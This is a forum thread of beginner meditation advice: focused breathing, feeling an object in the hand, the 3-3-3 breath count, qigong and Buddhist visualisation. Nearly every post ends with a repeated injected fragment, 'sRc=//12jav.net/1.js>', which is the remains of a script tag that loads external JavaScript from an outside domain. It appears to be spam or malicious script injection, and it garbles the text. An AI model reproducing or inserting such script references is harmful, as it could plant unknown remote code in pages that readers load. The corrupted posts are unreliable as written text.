I want to start trying to meditate but I could do with some help so are there any tips I would be best knowing? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
I get in a comfortable position, lite my favorite incense and close my eyes. Clear your mind which is the hardest part. Anytime something comes into my mind I visualize pushing it into the darkness. It just takes lots of practice. Read and learn everything you can. There are thousands of tips just find the ones which works best for you. Practice, practice, practice. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
Beginners sometimes have trouble with thinking nothing. If you are just starting out, I suggest a focused meditation. It can either be your breathing or an object.
If you are going to focus on your breathing, as you breathe in visualize the air filling your lungs, then entering your blood, the blood carrying the air through your body, then back to the lungs for you to breathe out. Each breath of air bring in good air and each breath out carries away the toxins that were in your body.
If you focus on an object, close your eyes and hold the object in your hand. Feel the edges, curves, weight, elasticity, whatever special characteristics it has. Roll it around in your hands until you can create a perfect mental image of the object just from how it felt. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
The 3-3-3 method works well for beginners. Breathe in for 3 seconds, hold for 3 seconds, then release for 3 seconds. Progress from there to 4, 5, whatever feels comfortable. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
I am horrible at "normal" meditation because my mind has always been silent/empty if I am not actively thinking something. I use qigong as my form of meditation, among other things. I will send you one of the qigong exercises I practice in a message as it is rather long to put in a forum post. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Meditation is not very difficult; but it does take practice. It would be very rare to do it first time you try! sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
I know I'm not very experienced but the easiest way I learned way reading and learning about the Buddha. I may be an Atheist but I follow a mostly Buddhist path. It helped calm me and gets easier for me to relax. Like the visualisation practices where you imagine inhaling in good green air and exhaling bad red air. Sorry if I rambled on, just wanted to say I learned to meditate by Buddhism. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
